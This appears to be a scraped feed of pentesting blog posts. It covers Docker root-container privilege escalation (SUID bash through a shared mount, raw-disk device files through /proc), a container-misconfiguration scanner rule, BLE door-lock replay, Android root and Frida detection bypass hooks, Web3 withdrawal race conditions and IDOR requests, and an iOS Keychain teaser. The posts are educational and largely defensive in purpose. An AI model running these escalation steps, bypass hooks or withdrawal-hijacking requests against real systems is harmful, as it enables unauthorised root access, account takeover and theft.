![](/content/images/2025/09/image-2.png)

Copy bash into the shared folder

![](/content/images/2025/09/image-3.png)

Changing ownership of the SUID file

Now the binary has permissions `-rwsrwxrwx`. This means that whenever it is executed, it runs with the privileges of its owner (root).

## Escalating on the host

Back on the host, our unprivileged user `rsgbengi` goes into the shared directory and runs the new `bash` binary with the `-p` flag:

```bash
./bash -p

```

![](/content/images/2025/09/image-4.png)

Privilege Escalation

A quick `whoami` confirms the escalation: we now have a root shell on the host.

## Theory behind all of this

The key to this attack is understanding how Docker mounts work and how the Linux kernel treats privileges. When you run a container as root, the process inside the container still has the full authority of the root user as far as the kernel is concerned. The container runtime may try to isolate the filesystem, network or processes, but once a host directory is mounted inside the container, that barrier becomes porous.

From the container’s perspective, the mounted directory is just another folder it can write to. When root inside the container changes ownership or sets special permissions on a file in that directory, those changes are applied directly to the underlying files on the host. There is no translation layer, it is the same inode seen from two different views.

This is where the SUID bit comes into play. In Linux, if a binary has the SUID bit set and is owned by root, any user who executes it will run the program with root privileges. So when root inside the container drops such a binary into the shared folder, the host inherits those changes instantly. An unprivileged user on the host, who normally would have no way to elevate, suddenly has access to a binary that the kernel will execute as root on their behalf.

What looks like a harmless convenience, mounting a directory to copy files back and forth, becomes a direct privilege escalation path. The kernel does not distinguish between “root in a container” and “root on the host” when it comes to filesystem ownership and permissions, and the SUID mechanism ensures that the consequences of that mistake are immediate and complete.

# Privilege Escalation - Second Pattern

This second scenario is more subtle. Instead of abusing a mounted host directory, we combine two different access points:

1.  Root inside the container.
2.  A non-privileged user on the host with the same UID as a process running inside the container.

When those conditions align, we can use `/proc/&lt;PID&gt;/root` on the host to interact with files created by root in the container, including dangerous device files.

## Setting up inside the container

We start a container as root and create a device file pointing to the host’s disk, e.g. with `mknod /sda b 8 0` followed by `chmod 777 /sda` (major 8, minor 0 is the host’s `/dev/sda`):

![](/content/images/2025/09/image-5.png)

Running the container

Now `/sda` exists inside the container and points directly to `/dev/sda` on the host. The wide-open permissions mean anyone can access it.

## Creating a matching user

Next, we create a user inside the container that mirrors a real host user. In this case, the host has a user `rsgbengi` with UID 1000. So inside the container:

```bash
userdel ubuntu           # remove default user
useradd -m -u 1000 -s /bin/bash rsgbengi

```

![](/content/images/2025/09/image-6.png)

Removing the ubuntu user

![](/content/images/2025/09/image-7.png)

Adding the rsgbengi user

Now the container has a user with UID 1000, exactly the same as the unprivileged host account.

## Launching a shell as that user inside the container

Switch to `rsgbengi` inside the container and run a shell:

```bash
su rsgbengi
/bin/sh

```

![](/content/images/2025/09/image-8.png)

Switching to the rsgbengi user inside the container

![](/content/images/2025/09/image-12.png)

Running a shell on the docker container

At this point, there is a `/bin/sh` process inside the container running with UID 1000. From the host’s perspective, that process also belongs to UID 1000: the unprivileged `rsgbengi` account.

## Finding the process from the host

On the host, as the non-privileged user, we can find that shell’s PID:

```bash
ps auxf | grep /bin/sh

```

Suppose the PID is `88610`.

![](/content/images/2025/09/image-9.png)

Shell created on the container detected

## Accessing the container’s filesystem via `/proc`

Linux exposes each process’s root filesystem under `/proc/&lt;PID&gt;/root`. From the host:

```bash
ls -l /proc/88610/root

```

Here we can see the container’s root filesystem, including the device file `sda` created earlier by root in the container:

![](/content/images/2025/09/image-11.png)

sda file

Because the file is world-readable/writable (`777`), the host user `rsgbengi` can now interact with it.

## Why this works

The core of this attack lies in how Linux handles device files and process namespaces. When root inside the container uses `mknod` to create a new device file pointing to `/dev/sda`, the kernel doesn’t see it as a fake placeholder. It is a real interface to the host’s physical disk, because device files are simply special inodes that reference kernel drivers. By leaving the file with world-writable permissions, root inside the container effectively built a backdoor into the host disk and made it accessible to anyone who can reach it.

On its own, that device file would still be trapped inside the container’s filesystem. The trick comes from aligning user IDs between host and container. When we create a user inside the container with the same UID as a real user on the host, any process running in the container under that UID is also recognized by the kernel as belonging to the same host account. From the kernel’s perspective, there is no distinction: UID 1000 is UID 1000, regardless of whether the process was launched from the container or the host.

Linux exposes each process’s view of the filesystem through `/proc/&lt;PID&gt;/root`. If a user owns the process, they are allowed to traverse that view. This means the host user with UID 1000 can navigate into the container’s filesystem for any process also running as UID 1000, and interact with files there as if they were local. In this case, the file `/sda` created by root in the container is visible under `/proc/&lt;PID&gt;/root/sda`. Because it was left with open permissions, the host user can now read it directly.

The end result is that an unprivileged account on the host, which normally has no business touching raw disk blocks, suddenly has that power handed to it by the container’s root. From here the user can extract sensitive information straight from disk or, with more careful manipulation, move toward full host compromise. What made this possible is not a single bug but the combination of three design choices: root authority inside the container, the global nature of UIDs across host and container, and the way Linux exposes process root filesystems through `/proc`.

# DEV Update - Detecting Root Containers with Valeris

It’s been a while since I last shared an update on [Valeris](https://github.com/rsgbengi/valeris). A lot has changed under the hood:

-   The tool has now moved from Rust-based detectors to **YAML templates**, so you can create new checks without recompiling.
-   I added a simple **update flag**, making it easier to keep Valeris up to date.
-   And several new templates have landed, including one that directly relates to the privilege escalation attacks we explored earlier.

One of the first misconfigurations Valeris can already spot is when a container is running as root. It’s still an early feature, but it works, and it’s implemented in a way that makes it easy to extend later.

Valeris uses **YAML templates** to define each check. These templates describe:

-   What to look for in the Docker runtime configuration.
-   How to match it (using JSONPath).
-   How to report it back to the user.
-   Suggested fixes to remediate the issue.

```yaml
id: root_user
name: &quot;Root User (YAML)&quot;
target: docker_runtime
severity: HIGH
description: Detect containers running as root.
match:
  jsonpath: &quot;$.Config.User&quot;
  equals: &quot;&quot;
message: &quot;Container is running as root&quot;
fix: |
  Specify a non-root user with the --user flag.
```

Here’s what’s happening:

-   The rule inspects `$.Config.User` from the Docker API.
-   If the field is empty, it means no user was set → the container defaults to root.
-   Valeris then raises a **High severity finding**, with a clear message and a suggested fix (`--user` flag).
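Conceptually, the check boils down to something like this (a simplified Python sketch of the rule’s logic; Valeris itself is written in Rust and matches via JSONPath):

```python
# Evaluate a root_user-style rule against Docker inspect output.
def root_user_finding(inspect_data):
    """Return a finding if Config.User is unset (container defaults to root)."""
    user = inspect_data.get("Config", {}).get("User", "")
    if user == "":
        return {
            "id": "root_user",
            "severity": "HIGH",
            "message": "Container is running as root",
            "fix": "Specify a non-root user with the --user flag.",
        }
    return None

assert root_user_finding({"Config": {"User": ""}}) is not None
assert root_user_finding({"Config": {"User": "1000:1000"}}) is None
```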

When you run the scanner against a test container, the output is straightforward:

![](/content/images/2025/09/image-13.png)

Running Valeris to detect root\_user

Right now Valeris is still in a very early stage. It only supports a handful of detectors, but the foundation is solid. Because checks are defined in YAML and powered by the Docker runtime API, adding new ones is as simple as writing another small rule.

Today it’s root users. Tomorrow it could be dangerous mounts, excessive capabilities, or exposed ports all defined as YAML templates that anyone can add.

You can see all the current detectors with the `list-plugins` argument or by browsing the [GitHub repo](https://github.com/rsgbengi/valeris). All of them live in the `rules` folder.

![](/content/images/2025/09/image-14.png)

Plugins available right now

My next step will probably be to develop a way to run the same scans not only against running containers but also against the Dockerfile itself, so developers can catch misconfigurations earlier in the pipeline. Let me know what you think!

# Conclusions

At the end of the day, containers running as root are not just a small misstep, they’re the foundation for many of the attacks we walked through. A simple mount here, a UID overlap there, and suddenly your “isolated” container is a shortcut to the host.

The good news is that these issues are easy to prevent once you know what to look for. Define a non-root user, avoid privileged flags, be careful with what you mount, and you’ve already closed the door on some of the simplest escalation paths.

Valeris won’t catch the full exploit chain, but it does highlight the risky defaults that make those chains possible. That alone can save you from turning a late-night `docker run` into a full compromise story.

# References

-   Docker breakout / Privilege Escalation. [https://blog.1nf1n1ty.team/hacktricks/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation](https://blog.1nf1n1ty.team/hacktricks/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation)
-   Docker engine security. [https://docs.docker.com/engine/security/](https://docs.docker.com/engine/security/)
-   OWASP Docker Security Cheat Sheet. [https://cheatsheetseries.owasp.org/cheatsheets/Docker\_Security\_Cheat\_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Docker_Security_Cheat_Sheet.html)</content:encoded><author>Ruben Santos</author></item><item><title>Breaking Mobile-to-Device Logic: When BLE Access Falls Apart</title><link>https://www.kayssel.com/newsletter/issue-13</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-13</guid><description>Mobile apps that unlock doors might seem secure — until you replay a BLE packet, go offline, or bypass the logic entirely.</description><pubDate>Sun, 13 Jul 2025 10:54:33 GMT</pubDate><content:encoded>Hey everyone 👋

Lately, I’ve been digging into mobile apps that interact with physical devices, like smart locks, BLE door readers, or NFC-based access systems.

These apps are fascinating because they blend software with hardware, and that means real-world consequences if something breaks. Like... people walking into buildings they shouldn&apos;t.

So in this issue, I want to share some attack paths, interesting tests, and observations that can help you break (or secure) apps that interact with the physical world.

Let’s get into it.

## Sniff BLE Traffic Even Without Special Hardware

If you don’t have a dedicated BLE sniffer, Android gives you a nice trick:

Go to `Developer Options` → **Enable Bluetooth HCI snoop log**  
This saves a log file at `/sdcard/btsnoop_hci.log` — pull it out and open it in Wireshark.

Once inside:

-   Look for UUIDs and write characteristics used to send commands
-   Try to identify a &quot;door unlock&quot; packet
-   Repeat the same operation multiple times — does the payload change?
-   If it doesn’t, you might be able to **replay it using Python** with something like [`bleak`](https://github.com/hbldh/bleak)

✅ **Test This:** Capture and replay a BLE command to unlock the door  
If it’s static and not signed, that’s a huge problem.

## Reversing Custom BLE Protocols

A lot of vendors try to hide behind **“proprietary protocols”**, assuming nobody will figure them out. Spoiler alert: we will.

If you’ve got the APK:

-   Drop it into **Jadx**, and search for characteristic UUIDs or BLE calls like `writeCharacteristic()`
-   Look for payload formatting code — you might find it’s just base64-encoded JSON or a simple byte array with no real protection
-   If the app builds a packet without any signature or cryptographic verification, that’s game over

**Inspect:** Is the reader validating anything? Or just accepting commands blindly?
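When the formatting code turns out to be base64-encoded JSON, a quick decode confirms it. The packet below is a hypothetical example of what such an app might build; the field names are illustrative.

```python
import base64, json

# Hypothetical packet as the app might build it in writeCharacteristic():
# plain JSON, base64-encoded, with no signature field at all
packet = base64.b64encode(json.dumps({"cmd": "unlock", "door": 4}).encode())

decoded = json.loads(base64.b64decode(packet))
print(decoded)                  # {'cmd': 'unlock', 'door': 4}
assert "sig" not in decoded     # nothing for the reader to verify: it accepts blindly
```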

## What Happens When You’re Offline?

This is one of the most overlooked attack surfaces in physical access apps.

Let’s say the backend issued you a credential 3 days ago. What happens if your phone has been offline since then?

-   Can you still open the door?
-   Is there a local expiration? Usage counter?
-   Can you modify local storage to reset state?

If the mobile app relies purely on remote revocation and doesn’t enforce local restrictions, you might still get in long after your access should’ve been revoked.
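The local checks that should exist can be sketched in a few lines. Field names here are hypothetical; the point is that expiry and usage limits must be enforced on-device, not only via remote revocation. If the app has nothing like this, an offline phone keeps opening doors indefinitely.

```python
import time

def credential_valid(cred, now=None):
    # Checks that must hold even with no network connectivity
    now = time.time() if now is None else now
    not_expired = cred["issued_at"] + cred["ttl"] > now
    has_uses_left = cred["max_uses"] > cred["uses"]
    return not_expired and has_uses_left

cred = {"issued_at": 0.0, "ttl": 86400, "uses": 0, "max_uses": 5}   # 24h credential
print(credential_valid(cred, now=3600.0))     # True: one hour in
print(credential_valid(cred, now=259200.0))   # False: 3 days offline, expired locally
```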

## How Are Credentials Stored?

Even if credentials are issued securely, how they’re **stored** matters a lot.

Things to look at:

-   Are they in the **Keystore** (Android) or **Keychain** (iOS)?
-   Do they use secure access flags like `kSecAttrAccessibleWhenUnlockedThisDeviceOnly`?
-   Are encrypted SharedPreferences really encrypted, or just obfuscated?

## Anti-Frida Defenses (And Why They Usually Suck)

Apps like these often try to block tools like **Frida** or detect rooted devices.

If you read **last week’s issue**, you’ll remember we dove deep into how to **bypass detection**, dump classes, and trace hooks even on hardened apps.  
📌 [_If you missed it, check it out here_](https://www.kayssel.com/newsletter/issue-12/)

But here&apos;s a quick refresher:

-   Use **Magisk DenyList** to hide root
-   Attach **Frida after launch** instead of before (`frida -U -n com.app`)
-   Try **Frida Codeshare** scripts like:
    -   `anti-frida-detection.js`
    -   `hide_frida_gum.js`
    -   `anti-root-bypass.js`
-   If you crash immediately, dump loaded classes and log suspicious method calls
-   Trace native logic with `frida-trace` or analyze `.so` files with `Ghidra` or `r2frida`

These tricks often give you visibility into how the app generates BLE packets or validates stored credentials.

## Other Cool Things to Try

A few more test ideas that don’t always get enough love:

#### 📡 Timestamp manipulation

If tokens expire locally, try changing the device clock  
Does it allow extending the token’s lifetime?

#### 🌍 Geo-fencing bypass

If the app checks location before allowing access, try using mock location to simulate valid zones.

#### ⏱️ Multi-device race conditions

What happens if two devices try to use the same credential simultaneously?  
Does the system de-sync, crash, or unlock both?

## Wrapping Up

Apps that interact with physical devices are high-impact targets: they sit at the intersection of mobile security, hardware protocols, and real-world consequences.

The good news?  
You can test a lot with just a rooted phone, Wireshark, and a bit of scripting.

To recap:

✅ Sniff BLE traffic with Android’s HCI snoop log  
✅ Reverse how commands are built and look for replay attacks  
✅ Explore offline behavior and revocation handling  
✅ Inspect how credentials are stored  
✅ Bypass anti-Frida and trace BLE logic  
✅ Get creative — timestamps, location spoofing, race conditions... they all matter

Hope this gives you a strong base to start testing apps that control hardware around you.

Thanks for reading, and see you next time  
Stay sneaky out there 🕶️

Ruben</content:encoded><category>Newsletter</category><category>mobile-security</category><author>Ruben Santos</author></item><item><title>Reversing Android Apps: Bypassing Detection Like a Pro</title><link>https://www.kayssel.com/newsletter/issue-12</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-12</guid><description>Techniques to bypass root, Frida, and SSL protections in modern Android apps</description><pubDate>Sun, 06 Jul 2025 10:08:32 GMT</pubDate><content:encoded>Hey everyone

Over the past couple of weeks, I’ve been working on some Android app assessments that turned out to be much more annoying than expected. Not because the logic was complex, but because the apps just refused to cooperate.

Frida was detected. The app crashed instantly. Root checks blocked everything. And SSL pinning made traffic analysis painful.

But here’s the thing: if an APK runs on your device, you can break it. Sometimes it just takes a little persistence, a lot of script tweaking, and a few clever tricks.

In this issue, we’re going to explore how to reverse engineer APKs, beat common detection techniques, and get your hooks in even when the app is fighting back hard.

Let’s get into it

## First Things First: Try Magisk DenyList

If you&apos;re testing on a rooted device, the quickest trick to try is Magisk’s DenyList.

DenyList allows you to select apps that should be &quot;shielded&quot; from root visibility. When enabled, Magisk hides things like `su`, root binaries, and known Magisk paths, making your device appear clean.

It works because most apps just scan for common root indicators. If those are missing, the app often stops caring.

To enable:

1.  Turn on Zygisk in Magisk settings
2.  Enable DenyList
3.  Add your target app
4.  Reboot and test

Sometimes, that’s all it takes.

## Frida Codeshare Scripts: Quick and Dirty Bypasses

Next, head to Frida Codeshare and try out some common scripts:

-   `anti-root-bypass.js`
-   `anti-frida-detection.js`
-   `hide_frida_gum.js`

These scripts patch common detection logic dynamically, overriding checks like `getRunningAppProcesses`, `isDebuggerConnected()` or native `ptrace()` calls.

```bash
frida -U -f com.example.app -l anti-frida-detection.js
```

I’ve had mixed results. On lightly protected apps, they work. On well-defended ones, not so much.

Still, these scripts take 30 seconds to try, and sometimes they’re enough to get you through.

## Don’t Launch With Frida – Attach After

Some apps only perform detection at launch. If Frida is already injected, the app sees it and crashes.

But if you:

1.  Launch the app normally (via Android launcher or `adb`)
2.  Wait for it to load
3.  Then attach using:

```bash
frida -U -n com.example.app
```

You might slip past those weak checks.

This works especially well when detection logic runs in `Application.onCreate()` or early init code. If Frida isn&apos;t present at that moment, the app might assume you&apos;re legit.

## Static Reversing: Find Detection Code with Jadx

Once you’ve unpacked the APK, drop it into [Jadx](https://github.com/skylot/jadx) and start searching for juicy strings:

-   `&quot;frida&quot;`
-   `&quot;root&quot;`
-   `&quot;magisk&quot;`
-   `&quot;ptrace&quot;`
-   `&quot;su&quot;`
-   `&quot;getprop&quot;`
-   `&quot;debugger&quot;`

These often lead you to custom detection logic like:

```java
public boolean isFridaDetected() {
    return getRunningServices().contains(&quot;frida&quot;);
}
```


Or native JNI bridges doing sketchy stuff.

Once found, hook and patch them:

```js
Java.perform(() =&gt; {
  const Check = Java.use(&quot;com.example.security.Checks&quot;);
  Check.isFridaDetected.implementation = function () {
    return false;
  };
});
```

Detection bypassed.

## Objection Patch: When You’re in a Hurry

[Objection](https://github.com/sensepost/objection) has a handy feature that tries to remove common protections from the APK directly.

```bash
objection patchapk --source app.apk
```

Basically, it repackages the APK and injects a Frida gadget so you can instrument the app without root.

But there’s a catch. Objection relies on `apktool`. If you&apos;re on Kali or another pentest distro, the default `apktool` is probably outdated or broken, so install the latest version manually from [https://apktool.org/docs/install](https://apktool.org/docs/install). After that, the patching should work perfectly 😄

## Dump Loaded Classes Before the Crash

If the app still crashes when Frida attaches, try this:

```js
Java.perform(() =&gt; {
  Java.enumerateLoadedClasses({
    onMatch: function (name) {
      console.log(name);
    },
    onComplete: function () {
      console.log(&quot;Done&quot;);
    }
  });
});
```

Run the script right before the crash happens. You’ll get a list of loaded classes, including the ones likely involved in detection.

Then, take it further.

## Log Which Methods Are Being Called

You can use Frida to hook and log methods from those suspicious classes:

```js
Java.perform(() =&gt; {
  const target = Java.use(&quot;com.example.security.DetectionManager&quot;);
  target.checkFrida.implementation = function () {
    console.log(&quot;checkFrida() called!&quot;);
    return false;
  };
});
```


Track which functions execute just before the crash. That’ll help you pinpoint where to dig deeper.

## JNI Detection: Follow the Native Trail

If Java-level detection isn’t working, the app may be using native code via JNI.

Use `frida-trace` to hook into `JNI_OnLoad` or other suspicious exports:

```bash
frida-trace -n com.example.app -i &quot;JNI_OnLoad&quot;
```

Then use tools like `nm`, `objdump`, or `strings` to peek inside native `.so` files.

Worst case, you’ll need to reverse with [Ghidra](https://ghidra-sre.org/) or [r2frida](https://github.com/nowsecure/r2frida) to understand what the native libs are doing.

This can take time, but when apps crash early or use aggressive native checks, it’s often your only real option.

## When Nothing Works: Patch for SSL Only

If all else fails, and the app is still detecting Frida, crashing on root, or obfuscating everything, and you&apos;re on a short pentest…

At least get network visibility.

[apk-mitm](https://github.com/shroudedcode/apk-mitm) patches the APK to disable SSL pinning so you can inspect HTTPS traffic in Burp or mitmproxy.

```bash
apk-mitm app.apk
```

Install the patched APK, run the app, and proxy the traffic.

This won’t let you hook with Frida, but you’ll still be able to watch tokens, endpoints, headers, and more.

Not ideal, but when the clock is ticking, it’s a life-saver.

## Wrapping Up

APK reversing is like picking a lock. Sometimes the first tool works. Sometimes you need to go layer by layer: Java, then JNI, then native assembly, until something cracks.

To recap:

-   Try Magisk DenyList for quick wins
-   Use Frida codeshare scripts to bypass common detections
-   Attach after launch to dodge init-time checks
-   Use Jadx to find detection logic and patch it
-   Patch with Objection, but make sure your apktool isn’t broken
-   Dump classes and trace methods before the crash
-   Trace JNI and reverse native code if needed
-   Patch SSL with apk-mitm if all else fails

Hope this gives you a solid framework to tackle stubborn Android apps. If you hit a wall, don’t give up. You’re probably just one hook or stub away from getting in.

Thanks for reading and see you next time  
Stay stealthy out there

— Ruben</content:encoded><category>Newsletter</category><category>mobile-security</category><author>Ruben Santos</author></item><item><title>When Web3 Withdrawals Meet Web2 Logic</title><link>https://www.kayssel.com/newsletter/issue-11</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-11</guid><description>How classic backend bugs like race conditions and IDORs still break Web3 withdrawal flows today</description><pubDate>Sun, 29 Jun 2025 08:45:36 GMT</pubDate><content:encoded>Hey everyone

Over the past couple of weeks, I’ve been working on a few projects involving Web3 deposit and withdrawal flows. And something kept coming up. Even when things look decentralized on the surface, the logic behind the scenes often runs through classic Web2 backends.

That mix is where things start to break.

In this issue we’re going to dig into what can go wrong when blockchain-based systems rely on traditional logic for handling money. We’ll walk through real attack scenarios like race conditions, broken authorization, weak 2FA enforcement, and some clever UI tricks that can turn secure-looking flows into easy targets.

Let’s get into it

## **Withdrawal Race Condition**

  
Here’s a classic bug that shows up more often than you’d think, especially in hybrid Web3 and Web2 setups.

Even though your withdrawals might end up on-chain, they often start with a Web2-style backend call. Something like a `POST /withdraw` that talks to your hot wallet signer.

Now imagine this. The backend checks if your balance is enough before processing the withdrawal, but doesn&apos;t lock anything or wrap it in a proper transaction. That’s when race conditions sneak in.

A race condition happens when multiple actions happen at the same time and the system can&apos;t keep up with the timing. If two or more requests check the balance at the exact same moment and both see the same number, they might both get approved before anything is updated.

Let’s make it concrete. I have 5 ETH in my account. I fire off 10 withdrawal requests for 1 ETH each, all in parallel. If the backend isn&apos;t careful, all of them see 5 ETH, all of them get approved, and suddenly I’ve withdrawn way more than I should.

You can simulate this pretty easily using [Turbo Intruder](https://portswigger.net/bappstore/9abaa233088242e8be252cd4ff534988) in Burp Suite or the [Parallel Repeater](http://portswigger.net/burp/documentation/desktop/tools/repeater/send-group#sending-requests-in-parallel). If you see multiple withdrawals going through from a limited balance, congrats, you’ve just uncovered a race condition.
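The unsafe check-then-update pattern is easy to reproduce locally. This is a sketch, not the target's code: the sleep artificially widens the gap between the balance check and the update so the race fires reliably, which is exactly what parallel requests do to a backend without locking.

```python
import threading, time

balance = 5        # ETH credited to the attacker's account
withdrawn = []

def withdraw(amount):
    global balance
    if balance >= amount:        # 1. check
        time.sleep(0.2)          # widen the gap so the race fires reliably
        balance -= amount        # 2. update, not atomic with the check
        withdrawn.append(amount)

threads = [threading.Thread(target=withdraw, args=(1,)) for _ in range(10)]
for t in threads:
    t.start()
for t in threads:
    t.join()

print(sum(withdrawn))    # 10 on a typical run: every request saw the full 5 ETH
```

The fix is the inverse: make the check and the debit one atomic operation (a database transaction with row locking, or an atomic conditional update).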

## **IDOR/BOLA on Withdrawals**

  
This one’s surprisingly common. [BOLA (Broken Object Level Authorization)](https://www.kayssel.com/post/bola-and-bfla/), or what many still call IDOR, happens when the backend forgets to check if the user actually owns the thing they’re trying to access. In this case, a withdrawal.

Let’s say your app shows your pending withdrawals like this:

```bash
GET /withdrawals/881
Authorization: Bearer your_token
```

Now imagine I change that to:

```bash
GET /withdrawals/882
```


And suddenly I’m looking at someone else’s withdrawal details. That’s BOLA.

But it doesn’t stop there. What if I go a step further and modify the withdrawal?

```bash
PATCH /withdrawals/882
Authorization: Bearer attacker_token
{ &quot;status&quot;: &quot;approved&quot;, &quot;to&quot;: &quot;0xAttackerWallet&quot; }
```

If the backend doesn’t check who owns withdrawal 882, I just hijacked someone’s funds and redirected them to my wallet.

This usually happens when IDs are predictable and the backend trusts the token too much without validating ownership. To test this, grab a valid request in Burp, increment the ID, and see if you can access or modify someone else’s data.

If it works, you’ve got a serious logic bug.
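Server-side, this entire class of bug comes down to one missing ownership check. A minimal sketch of what the backend should be doing (the store and field names are hypothetical):

```python
# In-memory stand-in for the withdrawals table; names are hypothetical
WITHDRAWALS = {
    881: {"owner": "alice", "amount": "1 ETH", "status": "pending"},
    882: {"owner": "bob",   "amount": "3 ETH", "status": "pending"},
}

def get_withdrawal(requesting_user, withdrawal_id):
    w = WITHDRAWALS.get(withdrawal_id)
    if w is None or w["owner"] != requesting_user:
        return {"error": 404}    # same response for missing and not-yours: no ID oracle
    return w

print(get_withdrawal("alice", 881))   # alice's own record
print(get_withdrawal("alice", 882))   # {'error': 404}: a valid token is not ownership
```

The same check has to run on PATCH and DELETE, not just GET; read-only checks with writable endpoints are exactly how funds get redirected.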

## Skipping 2FA During Withdrawals

On paper, adding 2FA to withdrawals sounds like a solid move. Before sending a large amount, the user has to confirm it with a code sent by SMS, email, or an authenticator app. Makes sense, right?

But here’s the catch. Just because the frontend asks for a 2FA code doesn&apos;t mean the backend is actually enforcing it.

Imagine this. I steal your session token. Maybe through phishing, maybe through a SIM swap. When I try to withdraw, the app sends me a nice little 2FA prompt. But instead of entering anything, I skip the UI and go straight to the withdrawal endpoint using the stolen token.

If the backend doesn’t verify whether the 2FA challenge was actually completed and validated, the withdrawal goes through anyway.

Worse, in some systems, the 2FA token field might be optional, reused, or even entirely ignored. That means an attacker could replay an old token or skip the field completely and still get the funds out.

To test this, try sending a withdrawal request:

-   Without the 2FA token
-   With a reused 2FA code
-   While skipping the entire verification step

If any of those work, then your 2FA is only protecting the UI, not the actual logic. And if the backend assumes “if it came from the app, it must be legit,” you&apos;re one step away from someone draining accounts without ever touching a code.
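What proper enforcement looks like server-side: the withdrawal only proceeds if a server-side record shows a fresh, unconsumed 2FA challenge completed by that same user. This is a sketch with hypothetical field names, not any particular framework's API.

```python
import time

CHALLENGES = {}   # challenge_id: {"user", "verified_at", "consumed"}

def can_withdraw(user, challenge_id, now=None, max_age=120):
    now = time.time() if now is None else now
    c = CHALLENGES.get(challenge_id)
    if c is None or c["user"] != user or c["consumed"]:
        return False               # missing, someone else's, or already used
    if now - c["verified_at"] > max_age:
        return False               # stale challenge: no replays of old approvals
    c["consumed"] = True           # strictly single use
    return True

CHALLENGES["abc"] = {"user": "alice", "verified_at": 1000.0, "consumed": False}
print(can_withdraw("alice", "abc", now=1010.0))  # True, and the challenge is consumed
print(can_withdraw("alice", "abc", now=1011.0))  # False: reuse is rejected
print(can_withdraw("alice", None, now=1012.0))   # False: the 2FA field is not optional
```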

## Double Execution via Retry

This one feels harmless at first. Some apps separate withdrawal into two steps: first you create the request, then you hit an `/execute` endpoint to actually send the funds.

That makes sense. Maybe the backend needs to wait for 2FA approval, compliance checks, or some manual confirmation. But here’s where things break.

If the backend doesn&apos;t properly mark the withdrawal as processed before executing it, an attacker can just call the `/execute` endpoint again. And again. And again.

Let’s say I request a withdrawal. I get back a `withdrawalId`. After it’s approved, the app calls:

```bash
POST /withdraw/execute/abc123
Authorization: Bearer stolen_token
```

Now I take that exact same request and send it ten times in a row. If there’s no protection in place, the backend might process it each time, triggering multiple payouts from a single request.

In some cases, the same `withdrawalId` might return a new transaction hash every time. Or even worse, all of them succeed and send funds.

To test this, try delaying the first execution slightly. Then spam the same endpoint in parallel using Turbo Intruder or Parallel Repeater. If the backend doesn’t lock or update the withdrawal status before sending the funds, you’ll see multiple transactions.

This kind of bug is sneaky. It often hides in systems where developers assume the `/execute` endpoint will only be called once by the frontend.
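The defense is an atomic state transition: flip the withdrawal to a processing state before sending funds, so every later call hits a terminal state. A sketch of the pattern (real systems do the compare-and-set inside a database transaction; the class and states here are illustrative):

```python
import threading

class Withdrawals:
    def __init__(self):
        self.state = {"abc123": "approved"}
        self.lock = threading.Lock()
        self.payouts = 0

    def execute(self, wid):
        with self.lock:                          # compare-and-set under a lock
            if self.state.get(wid) != "approved":
                return "rejected"
            self.state[wid] = "processing"       # claimed before any funds move
        self.payouts += 1                        # stand-in for the on-chain send
        self.state[wid] = "done"
        return "sent"

w = Withdrawals()
results = [w.execute("abc123") for _ in range(10)]
print(results.count("sent"), w.payouts)   # 1 1: only the first call pays out
```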

## **Address Poisoning via 2FA Approval Metadata**

  
This one’s more social engineering than technical exploit, but it’s just as dangerous.

Many apps show a 2FA prompt before approving a withdrawal. The user sees a message like “Approve withdrawal of 10 ETH to 0x1234...abcd” in their mobile authenticator, push notification, or security app.

That message is supposed to give the user confidence that everything looks right. But what if the attacker controls part of what the user sees?

Imagine this. I initiate a withdrawal to my own wallet address, something ugly like:

0xDeadBeefCafe0000000000000000000000000000

But I include a fake label in the request, like:

&quot;label&quot;: &quot;0xAbC123...4567 (Ledger Wallet)&quot;

If the backend doesn’t sanitize or validate that label before sending the 2FA challenge, the user might see:

Approve withdrawal  
Amount: 10 ETH  
To: 0xAbC123...4567 (Ledger Wallet)

It looks legit, but it’s completely fake. The label is attacker-controlled. The actual funds are going to a malicious address.

This trick works because users trust what they see in security prompts. If the backend allows user-supplied metadata to appear in that prompt, it becomes a perfect tool for deception.

To test this, try creating a withdrawal with custom fields like `label`, `note`, or `display_name`. If they show up in the 2FA app or prompt, you’ve found a dangerous vector for misleading users.

If the 2FA UI is showing attacker-supplied data, then it&apos;s no longer a second factor of authentication. It&apos;s a second factor of illusion.
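On the defensive side, the prompt should be built only from server-verified fields, and anything address-shaped in user-supplied metadata is a red flag worth dropping outright. A sketch; the regex and field names are illustrative, not a complete sanitizer:

```python
import re

ADDRESS_RE = re.compile(r"0x[0-9a-fA-F]{4,}")

def build_prompt(amount, destination, label=None):
    # Only the verified destination may look like an address in the prompt;
    # drop user-supplied labels that try to impersonate one
    if label and ADDRESS_RE.search(label):
        label = None
    line = "Approve withdrawal of " + amount + " to " + destination
    return line + (" (" + label + ")" if label else "")

print(build_prompt("10 ETH", "0xDeadBeefCafe0000", label="0xAbC123...4567 (Ledger Wallet)"))
# Approve withdrawal of 10 ETH to 0xDeadBeefCafe0000
```

Benign labels like a saved contact name can still be shown; the point is that nothing attacker-controlled gets to masquerade as the destination.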

## Wrapping Up

Deposit and withdrawal flows might seem simple, but when Web3 meets Web2, things can get messy fast.  
All the classic logic bugs from traditional apps show up here too: race conditions, IDORs, weak 2FA enforcement, and misleading UI. The only difference is that now the bugs are moving money.

If you&apos;re testing one of these systems, forget the hype for a second and focus on the logic.  
Ask yourself:

-   Can I trigger the same action twice?
-   Is the backend relying too much on the frontend?
-   Are users being shown information they shouldn’t trust?

These flows are high-value targets, and small mistakes can lead to real losses.  
Hopefully, this gave you a few new ideas to try out in your next project or audit.

Thanks for reading and see you next time. Keep poking at the logic and stay safe out there.</content:encoded><category>Newsletter</category><category>mobile-security</category><author>Ruben Santos</author></item><item><title>Cracking the iOS Keychain: What It Protects, Where It Fails</title><link>https://www.kayssel.com/newsletter/issue-10</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-10</guid><description>iOS Keychain 101: What It Is and How to Hack It</description><pubDate>Sun, 22 Jun 2025 13:14:56 GMT</pubDate><content:encoded>Hey everyone!

In my previous issue, we explored the Android Keystore what it protects, where it fails, and how to attack it. This time, we’re switching sides to look at its Apple counterpart: the iOS Keychain.

If you’re new to mobile security or pentesting, don’t worry I’ll break down what the Keychain is, why it matters, and how attackers can exploit weak implementations.

Let’s crack open Apple’s vault 👇

